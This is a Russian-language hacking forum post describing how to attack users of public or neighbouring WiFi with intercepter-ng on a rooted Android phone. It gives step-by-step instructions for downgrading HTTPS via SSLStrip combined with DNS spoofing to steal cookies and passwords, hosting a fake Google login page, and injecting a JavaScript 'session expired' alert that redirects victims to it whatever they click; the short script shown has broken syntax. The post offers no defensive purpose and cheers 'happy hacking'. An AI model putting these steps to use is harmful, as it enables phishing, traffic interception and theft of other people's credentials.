Играем с трафиком общественного WiFi или соседа

  • Автор темы Diogen
  • Дата начала
  • Просмотров 10409 Просмотров

Diogen

Пролетарий
19
36
6 Апр 2018
Всем привет, ола, шалом, хай.

Будем использовать многим известный intercepter-ng и дополнительные утилитки. В руках андроид ( у меня 6.0.1) и права ROOT. Сам intercepter-ng можно скачать с сайта клирнета sniff.su. Кто экспериментировал или пользовался этой прогой знают, что реально видеть трафик или снять куки, а то и пароли можно только с HTTP трафика жертвы. А что же делать, если даже ВК и однокласники используют HTTPS соединение? Вариантов не много, но разберем какие я смог реализовать.

Итак гоу:

1. Встроенный SSLStrip по честноку теоритически должно сработать только если ну очень долго сниффишь один хост и то, не факт. Не знаю как у вас, но у меня не получалось просто поставить галочку и бац, клиент уже на HTTP. Хотя обнаружил один интересный способ - SSLStrip очень даже не плохо работает в паре с DNS Spoofing. Обычно DNS Spoofing используется для того, чтобы сделать редирект. Например клиент заходит в vk. com , а ты его редиректишь на подложный сайт, где лежит твой фишинг. В этом случае, браузер может ругнуться на такой финт. Но если прописать vk.com:vk.com, а значит сделать редирект с ВК на тот же ВК, тогда SSLStrip таки может пригодиться. Включаем куки киллер, редирект и жди. Эта схема срабатывала у меня на vk, ok, mail.ru, yahoo, и только один раз на фб. Гугл не разу не поддался. Тогда я решил другим способом его взять.


2. Даю саму идею, этот способ можно реализовывать по разному. Один из ленивых вариантов опишу. Задача создать фейк страницы логина Гугла. Чтобы не париться, я взял из библиотеки intercepter-ng под винду. Там лежит готовый html без скриптов php. Кидаем себе на андрюху. Далее поднимаем web сервак в локалке. Делаю это утилиткой Servers Ultimate Pro. Указываю нужный файл index с html гугла и готово. Короче все как надо проверяем, смотрим ip сервера, указываем порт, заходим, страница логина открылась - норм.
Долее посылаем жертву на наш фейк. Одна проблема, DNS Spoofing не сработает, так как порт прописывается через символ " : " - двоеточие, а intercepter это воспинимает как редирект на полный адрес. Кроме этого, просто так, без причины послать жертву на страницу логина Гугл весьма палевно. Представьте, он смотрит новости про Дом2, а тут бац, страница логина Гугла...
Следующая задача, это без подозрений направить жертву на наш фейк. Единственное, до чего моя фантазия добрела, это ALERT через HTTP injections - "ваша сессия истекла, войдите еще раз... бла бла бла". Да, хорошо, алерт загнали, жертву предупредили - все мол окей, не переживай, мы почти гугл и сейчас тебя хакнем. Сервер подняли, но после алерта, нам надо чтобы жертва сразу перешла куда надо. Я сам не програмер, поэтому пришлось порыться. Было трудно, и очень злился, от того, что у опытных снега зимой не допросишься, а на вопрос- как? всегда ответ - сам муфлон. Рылся и нашел, потом сам допилил и с удовольствием делюсь.
Пишем скрип на js. Качаем на телефон блокнот QuickEdit, указываем что будем писать на JS и прописываем :

var b = confirm("Сессия устарела, пожалуйста, войдите заного")
if (b==0) {
<!-- location="http:// ip вашего сервера и порт"
//-->
} else { location="http:// тоже ip вашего сервера и порт"
);
Сохраняем как JS и инжектим через вкладку intercepter-ng под названием HTTP injections.
Теперь мы имеет Алерт, который перенаправит жертву на наш фейк, который мы подняли в локалке, причем не важно, клиент нажмет ок или отмена, все равно его кинет к нам в пасть. Клиент предупрежден, вбивает пароль и сам intercepter его ловит. Для этого не нужны никакие скрипты на php, хотя можете и с ними. Так же можете поиграться с Servers Ultimate Pro, поднять там DNS сервер, чтобы все выглядело совсем уж идеально, загрузить страницу фейсбука, ВК и в этои духе.

Удачного хакинга бразерс. Если есть еще идеи, делитесь, не будьте жадными.